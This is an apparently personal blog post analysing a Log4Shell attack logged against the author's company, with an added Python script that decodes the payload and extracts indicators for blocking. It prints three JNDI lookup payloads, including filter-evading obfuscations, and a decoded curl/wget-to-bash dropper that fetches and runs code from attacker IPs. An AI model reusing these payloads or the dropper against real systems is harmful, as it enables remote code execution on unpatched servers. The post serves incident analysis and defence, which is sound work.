Log4j shell attack. Let’s analyze one attack we received
No one thinks about security, until they get hit by a cyber atta
Disclaimer
We are safe, everything was patched the day the vulnerability was announced.
Background
I work for a luxury company and we use Datadog for logging, tracing, infrastructure and monitoring.
I searched just out of curiosity and found a few attacks, one of which was very interesting.
Please don’t run any commands on your computer. Use a `VM` or `container` instead
I use gitpod.io, which is a containerized Ubuntu instance that has no access to any of my private data. I don’t even use a VM on GCP; it is too dangerous.
So what does the attack look like?
It is just an endpoint (a JNDI lookup) that log4j will resolve.
This is the log I got from Datadog
It has so many levels of complexity
To me it looks like a guy who really knows what he is doing.
We can see 3 strings.
- ${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=}
- ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=}
- ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=}
So he sent 3 versions of the payload, in case one of them was blocked because we were string filtering against it.
`${lower:l}${lower:d}${lower:a}${lower:p}` makes sure that if we are filtering for the literal `ldap` we won’t be able to catch it, while log4j will still resolve it into `ldap`. He used the same trick for the `jndi` word.
If we take the IP and search for its location, we find that it is from Russia.
I just searched Google for “ip location” and the first site that came up is this one.
So basically our hacker has a server in Russia and is trying to make our service call his server on port 12344.
I don’t see any special reason for him to be using this port. If you see one, please let me know in the comments.
Let’s see the params that he is using.
/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g=
The first 3 path segments (`Basic/Command/Base64`) don’t look very interesting, except that he may be using this server for other kinds of attacks, and that it is very precise and organized. Maybe he was not a black hat but more of a developer who was trying to see if he could hack us with this easy-to-use log4j bug.
But the base64 string is very interesting; let’s decode it with an online decoder like https://www.base64decode.org/
Now, this is interesting!
Damn, so he hid bash code in a base64 string. I’ve been a developer for 10 years and did not know that a base64 string could decode into a bash script.
The bash script does a curl call to the server 195.54.160.149 on port 5874.
So the IP is again from Russia, on a port that has nothing special about it.
In case you were asking what the IP after the port is about, well my dear reader, this is a great question with a very simple answer: the IP 195.54.160.149 is a proxy to 34.231.205.69. So the real server is 34.231.205.69; let’s see its location.
Surprise, surprise, this is a USA IP. Someone pretended to be someone else.
This is very interesting, but I won’t comment.
Another thing about the bash script is that it first curls 195.54.160.149:5874, then if the curl does not return an error it executes the wget; the magic part here is the or operator `||`.
Also, another thing to notice is the `-s` (silent) option, which will create no logs; very smart.
If the curl does not return an error, then the script uses wget to download a file (`wget -q -O- 195.54.160.149:5874/34.231.205.69:80`) and passes the entire script to bash using the pipe `|`, so it gets executed without leaving any tracks.
```bash
(curl -s 195.54.160.149:5874/34.231.205.69:80||wget -q -O- 195.54.160.149:5874/34.231.205.69:80)|bash
```
Smart, very smart.
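As an added example, not part of the original post, the following Python decodes the base64 path from the logged lookup and breaks the resulting one-liner into its stages so the indicators can be pulled out for blocking and log searches. In shell, `a || b` runs `b` only when `a` exits non-zero, so the `wget` is a fallback for a host where `curl` is missing or fails; `curl -s` suppresses curl's own progress output, and `-O-` tells wget to write the download to stdout, which is why the result can be piped straight into `bash`. The function names and the layout of the `parse_dropper` result are my own assumptions.

```python
import base64
import re
import shlex

# Base64 path segment copied from the logged JNDI lookup in the post.
PAYLOAD_B64 = "KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8zNC4yMzEuMjA1LjY5OjgwfHx3Z2V0IC1xIC1PLSAxOTUuNTQuMTYwLjE0OTo1ODc0LzM0LjIzMS4yMDUuNjk6ODApfGJhc2g="


def decode_payload(b64: str) -> str:
    """Decode the /Basic/Command/Base64/<...> segment into the shell one-liner."""
    return base64.b64decode(b64).decode("utf-8", errors="replace")


# host[:port][/path] tokens as they appear after curl/wget; the scheme is
# optional because the dropper omits it.
HOST_TOKEN = re.compile(r"^(?:[a-z]+://)?(\d{1,3}(?:\.\d{1,3}){3})(?::(\d+))?(/\S*)?$")
IPV4 = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
# A single '|' that is not part of '||': separates pipeline stages.
PIPE = re.compile(r"(?<!\|)\|(?!\|)")


def parse_fetch(stage: str) -> dict:
    """Describe one 'curl ...' / 'wget ...' alternative of the fallback chain."""
    tokens = shlex.split(stage)
    info = {
        "tool": tokens[0],
        "flags": [t for t in tokens[1:] if t.startswith("-")],
        "host": None,
        "port": None,
        "path": None,
    }
    for token in tokens[1:]:
        m = HOST_TOKEN.match(token)
        if m:
            info["host"] = m.group(1)
            info["port"] = int(m.group(2)) if m.group(2) else None
            info["path"] = m.group(3)
            break
    return info


def parse_dropper(cmd: str) -> dict:
    """Split '(fetchA||fetchB)|bash' into its fallback chain and interpreter.

    The '||' alternatives run left to right; each one is tried only if the
    previous one exited non-zero. The output of whichever succeeds is piped
    to the final stage (the interpreter).
    """
    stages = [s.strip() for s in PIPE.split(cmd.strip()) if s.strip()]
    fetch_group = stages[0].strip("()")
    alternatives = [parse_fetch(a) for a in fetch_group.split("||")]
    return {
        "interpreter": stages[-1] if len(stages) > 1 else None,
        "alternatives": alternatives,
        # Every IPv4 literal in the command, first-seen order, duplicates dropped;
        # this also catches the address embedded in the URL path.
        "ipv4": list(dict.fromkeys(IPV4.findall(cmd))),
        # host:port pairs the victim would actually connect to.
        "endpoints": sorted({f"{a['host']}:{a['port']}" for a in alternatives if a["host"]}),
    }


if __name__ == "__main__":
    command = decode_payload(PAYLOAD_B64)
    print("decoded:", command)
    for key, value in parse_dropper(command).items():
        print(f"{key}: {value}")
```

The `endpoints` list is what goes into an egress block rule or a proxy-log search, and `ipv4` is the wider indicator set including the address carried in the path. The same parser handles any `(fetch||fetch)|interpreter` dropper of this shape, not just the one from the post.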
Let’s see what this command downloads.
I will open a Gitpod instance and modify the script to download the bash script instead of executing it:
```bash
(curl -s 195.54.160.149:5874/34.231.205.69:80||wget -q -O- 195.54.160.149:5874/34.231.205.69:80) > bad-actor-script.txt
```
So it looks like it does not return anything: an empty string.
I guess he removed the script from the response and puts it back only when he is doing the attacks.
My thoughts
I think there were other levels into this attack but he removed the script from the response.
I think the USA IP is just a free amazon account that he (or she ) uses as a proxy.
I think this is a very skilled person, who has done many attacks, has a lot of experience, and knows how to cover their tracks.
I, to some extent, like him. Great job!
What do you think about this attack? Let me know in the comments.
Also, let me know if you want to see other attacks that we received.
Thank you for reading and as always,
If you enjoyed please leave a few claps 👏👏👏
As it helps me a lot.
Have a lovely day.